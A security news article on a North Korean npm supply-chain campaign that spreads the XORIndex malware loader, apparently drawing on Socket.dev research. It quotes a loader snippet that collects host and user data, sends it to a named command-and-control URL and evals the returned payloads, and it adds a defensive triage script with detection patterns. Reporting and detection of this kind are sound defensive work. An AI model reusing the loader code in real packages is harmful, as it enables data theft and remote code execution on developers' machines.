North Korean Hackers Weaponized 67 Malicious npm Packages to Deliver XORIndex Malware

North Korean threat actors have escalated their software supply chain attacks with the deployment of 67 malicious npm packages that collectively garnered over 17,000 downloads before detection.

This latest campaign represents a significant expansion of the ongoing “Contagious Interview” operation, introducing a previously unreported malware loader dubbed XORIndex alongside the existing HexEval Loader infrastructure.

The newly discovered XORIndex malware, named for its distinctive use of XOR-encoded strings and index-based obfuscation techniques, demonstrates the threat actors’ continued evolution in developing sophisticated evasion mechanisms.

The malicious packages infiltrated the npm ecosystem through 18 different accounts registered with 15 distinct email addresses, with 27 packages remaining active on the registry at the time of discovery.

Socket.dev analysts identified this campaign as part of a broader North Korean cyber espionage effort targeting developers, cryptocurrency holders, and individuals with access to sensitive credentials.

The XORIndex Loader operates as a multi-stage attack framework, initially collecting host metadata before decoding and executing the BeaverTail second-stage malware, which subsequently references the InvisibleFerret backdoor for persistent access.

Timeline of HexEval and XORIndex Loader campaigns (Source – Socket.dev)

The campaign’s infrastructure relies on hardcoded command and control endpoints hosted on legitimate platforms like Vercel, utilizing URLs such as https://soc-log.vercel.app/api/ipcheck and https://log-writter.vercel.app/api/ipcheck.

This approach allows the threat actors to maintain operational security while leveraging trusted hosting services to evade detection mechanisms.

The XORIndex Loader has accumulated over 9,000 downloads between June and July 2025, operating in parallel with the continuing HexEval campaign that has generated an additional 8,000 downloads across newly discovered packages.

This dual-track approach demonstrates the threat actors’ commitment to maintaining multiple attack vectors simultaneously.

XORIndex Infection Mechanism and Code Execution

The XORIndex Loader’s infection mechanism begins immediately upon package installation, leveraging Node.js post-install hooks to execute malicious code without user interaction.

The malware employs a sophisticated reconnaissance phase, gathering comprehensive system information including hostname, username, external IP address, geolocation data, and platform details before establishing communication with command and control servers.

A representative code snippet from the eth-auditlog package demonstrates the loader’s core functionality:

// Collects local telemetry (host/user/IP/geo/platform)
async function gatherInfo() {
    const ip = await publicIp.v4();
    const geo = (await axios.get(`http://ip-api.com/json/${ip}`)).data;
    return {
        host: os.hostname(),
        user: os.userInfo().username,
        ip,
        location: geo,
        platform: os.platform()
    };
}

// Sends beacon and executes threat actor-supplied JavaScript payloads
module.exports = async function writer() {
    const info = await gatherInfo();
    const version = process.env.npm_package_version;

    axios.post("https://log-writter.vercel.app/api/ipcheck", { ...info, version })
         .then(res => {
             eval(res.data.s1);    // Execute primary payload
             eval(res.data.s2);    // Execute optional secondary payload
         });
};
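The two traits the snippet above exposes, a lifecycle hook that runs code at install time and eval() applied to whatever the beacon endpoint returns, are what a pre-install triage check can key on. The following is an added example written for this article, not code from Socket.dev or from any of the packages; the indicator hosts are the two C2 endpoints named above, and the sample package and its index.js are constructed for illustration.

```javascript
// Added example (not from the article or Socket.dev): heuristic triage of an
// npm package for XORIndex/HexEval-style install-time loaders. The indicator
// hosts are the two C2 endpoints the article names; the sample package below
// is constructed for illustration and is not one of the 67 real packages.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const KNOWN_C2_HOSTS = ["soc-log.vercel.app", "log-writter.vercel.app"];
// eval()/new Function() applied to an HTTP response object, as the loader does
const EVAL_OF_RESPONSE = /\b(?:eval|Function)\s*\(\s*(?:res|response|data)\b[^)]*\)/;
// host, user, platform and public-IP/geolocation lookups seen in gatherInfo()
const TELEMETRY_CALLS = /os\.(?:hostname|userInfo|platform)\(|publicIp\.v4\(|ip-api\.com/;

// pkgJsonText: contents of package.json; files: { "relative/path.js": source }
function triagePackage(pkgJsonText, files) {
  const pkg = JSON.parse(pkgJsonText);
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push(`lifecycle hook "${hook}": ${scripts[hook]}`);
  }
  for (const [name, src] of Object.entries(files)) {
    for (const host of KNOWN_C2_HOSTS) {
      if (src.includes(host)) findings.push(`${name}: known C2 host ${host}`);
    }
    if (EVAL_OF_RESPONSE.test(src)) findings.push(`${name}: eval() of network response`);
    if (TELEMETRY_CALLS.test(src)) findings.push(`${name}: host/user/IP telemetry collection`);
  }
  // A lifecycle hook plus eval() of fetched data is the loader's signature;
  // either alone still deserves a human look before the package is installed.
  const hasHook = findings.some(f => f.startsWith("lifecycle hook"));
  const hasEval = findings.some(f => f.includes("eval()"));
  const verdict = hasHook && hasEval ? "block" : findings.length ? "review" : "clean";
  return { verdict, findings };
}

// Constructed sample mirroring the shape of the eth-auditlog snippet.
const SAMPLE_PKG_JSON = JSON.stringify({
  name: "example-auditlog", version: "1.0.0", scripts: { postinstall: "node index.js" }
});
const SAMPLE_FILES = {
  "index.js": `const info = { host: os.hostname(), platform: os.platform() };
axios.post("https://log-writter.vercel.app/api/ipcheck", info)
     .then(res => { eval(res.data.s1); });`
};

console.log(JSON.stringify(triagePackage(SAMPLE_PKG_JSON, SAMPLE_FILES), null, 2));
```

In practice the same function would be run over the unpacked tarball of each dependency before installation (for example by fetching with `npm pack` and reading the files), with `--ignore-scripts` as the fallback whenever the verdict is not clean.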

The loader’s evolution from basic prototypes to sophisticated malware demonstrates deliberate advancement in obfuscation techniques, progressing from simple remote code execution capabilities to comprehensive system profiling and multi-endpoint command rotation, positioning it as a formidable threat to software supply chain security.
